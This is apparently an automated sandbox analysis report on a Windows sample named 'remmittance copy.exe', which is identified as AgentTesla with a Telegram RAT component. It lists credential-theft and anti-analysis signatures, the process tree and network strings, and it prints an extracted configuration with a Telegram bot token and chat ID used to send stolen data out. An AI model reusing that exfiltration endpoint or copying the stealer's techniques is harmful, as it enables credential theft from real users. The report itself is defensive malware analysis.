Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report remmittance copy.exe

Overview

General Information

Sample Name:remmittance copy.exe
Analysis ID:510735
MD5:c039d3d94f0cc82369c066e26a67e0f6
SHA1:79519d3cbee4d7af49cf1572ed9a5fa87b2186fe
SHA256:219816561a364b4e85a344de1a4d7c7f74a01068f9a51bbb7e3101c9c9dd05ac
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • remmittance copy.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\remmittance copy.exe' MD5: C039D3D94F0CC82369C066E26A67E0F6)
    • remmittance copy.exe (PID: 2248 cmdline: C:\Users\user\Desktop\remmittance copy.exe MD5: C039D3D94F0CC82369C066E26A67E0F6)
    • remmittance copy.exe (PID: 3864 cmdline: C:\Users\user\Desktop\remmittance copy.exe MD5: C039D3D94F0CC82369C066E26A67E0F6)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1373897190", "Chat URL": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.remmittance copy.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.0.remmittance copy.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                5.0.remmittance copy.exe.400000.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.0.remmittance copy.exe.400000.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    5.0.remmittance copy.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.0.remmittance copy.exe.400000.10.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1373897190", "Chat URL": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument"}
                      Source: remmittance copy.exe.3864.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendMessage"}
                      Source: 5.0.remmittance copy.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.remmittance copy.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.remmittance copy.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.remmittance copy.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.remmittance copy.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.0.remmittance copy.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: remmittance copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
                      Source: remmittance copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5bHost: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: http://NoCGvF.com
                      Source: remmittance copy.exe, 00000005.00000002.925105112.0000000003512000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comcomm
                      Source: remmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.commna
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/
                      Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocumentdocument-----
                      Source: remmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4.l
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://qEv5A6okmkiAozFZ9P4.org
                      Source: remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownHTTP traffic detected: POST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5bHost: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.0.remmittance copy.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b7C91D473u002d0DDAu002d4702u002d9A20u002d92CE3F18005Du007d/u003583F6263u002dB84Eu002d47F2u002d98C9u002dCCA7257F7A36.csLarge array initialization: .cctor: array initializer size 12005
                      Source: 5.0.remmittance copy.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b7C91D473u002d0DDAu002d4702u002d9A20u002d92CE3F18005Du007d/u003583F6263u002dB84Eu002d47F2u002d98C9u002dCCA7257F7A36.csLarge array initialization: .cctor: array initializer size 12005
                      Source: 5.0.remmittance copy.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b7C91D473u002d0DDAu002d4702u002d9A20u002d92CE3F18005Du007d/u003583F6263u002dB84Eu002d47F2u002d98C9u002dCCA7257F7A36.csLarge array initialization: .cctor: array initializer size 12005
                      Source: remmittance copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_006B946A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_006B943A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_006B9353
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_04ECCE94
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_04EC4920
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_04EC4910
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_0501C408
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_0501C3F8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 4_2_00149353
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 4_2_0014943A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 4_2_0014946A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00C29353
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00C2946A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00C2943A
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC51D0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC94E0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC0DF8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DCBE98
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC09E0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC9B78
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DCE760
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DDB5A8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD2D50
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD2618
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD1FE0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DDA770
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD9DB8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DEA074
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE7950
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE1BD0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE87F8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DEDB1E
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE30F8
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE19B0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE59A0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE1157
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FC47A0
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FC4790
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DDB660
                      Source: remmittance copy.exe, 00000000.00000000.658275489.000000000071A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepkWOHfaeoUgOQtOOIIrYvXqkodqITNMscRuGJ.exe4 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000004.00000000.674939754.00000000001AA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000005.00000000.678550597.0000000000C8A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamepkWOHfaeoUgOQtOOIIrYvXqkodqITNMscRuGJ.exe4 vs remmittance copy.exe
                      Source: remmittance copy.exe, 00000005.00000002.923372714.00000000010F8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs remmittance copy.exe
                      Source: remmittance copy.exeBinary or memory string: OriginalFilenameFlushWriteAsyncd.exe8 vs remmittance copy.exe
                      Source: remmittance copy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: remmittance copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: remmittance copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\remmittance copy.exe 'C:\Users\user\Desktop\remmittance copy.exe'
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess created: C:\Users\user\Desktop\remmittance copy.exe C:\Users\user\Desktop\remmittance copy.exe
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remmittance copy.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@1/1
                      Source: C:\Users\user\Desktop\remmittance copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\remmittance copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: remmittance copy.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: 5.0.remmittance copy.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.remmittance copy.exe.400000.10.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.remmittance copy.exe.400000.6.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.remmittance copy.exe.400000.6.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.remmittance copy.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.remmittance copy.exe.400000.8.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\remmittance copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\remmittance copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: remmittance copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: remmittance copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: remmittance copy.exe, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.remmittance copy.exe.6b0000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.remmittance copy.exe.6b0000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.3.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.2.remmittance copy.exe.140000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.remmittance copy.exe.140000.2.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.13.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.2.remmittance copy.exe.c20000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.3.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.0.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.9.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.2.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 5.0.remmittance copy.exe.c20000.1.unpack, ShallowThought/GameEngine.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_07853D90 push esp; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 0_2_07853952 pushfd ; iretd
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC2877 push ebx; ret
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DC1B9A push edx; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DD7A37 push edi; retn 0000h
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_00DE030B push 8BFFFFFFh; retf
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FCCF71 push esp; iretd
                      Source: C:\Users\user\Desktop\remmittance copy.exeCode function: 5_2_02FCDB4D push FFFFFF8Bh; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.80880242174
                      Source: C:\Users\user\Desktop\remmittance copy.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\remmittance copy.exeProcess information set: NOOPENFILEERRORBOX
